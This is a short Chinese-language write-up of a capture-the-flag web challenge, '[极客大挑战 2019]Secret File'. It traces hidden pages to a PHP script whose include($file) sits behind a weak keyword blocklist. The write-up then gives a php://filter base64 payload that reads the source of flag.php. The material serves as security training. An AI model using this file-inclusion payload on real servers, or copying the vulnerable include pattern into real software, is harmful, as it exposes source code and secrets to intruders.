[PHP知识库][极客大挑战 2019]Secret File

本质上考的 信息收集

一、在源码中发现Archive_room.php

?二、在Archive_room.php的源码中发现action.php

?三、访问action.php会跳转到end.php

用burp 抓包。发送到repeater模块。拦截。发现? ?secr3t.php ?

四、访问secr3t.php ?

?得到源码。简单审计。

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

直接上伪协议读取。

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码后的源码

解码即可

?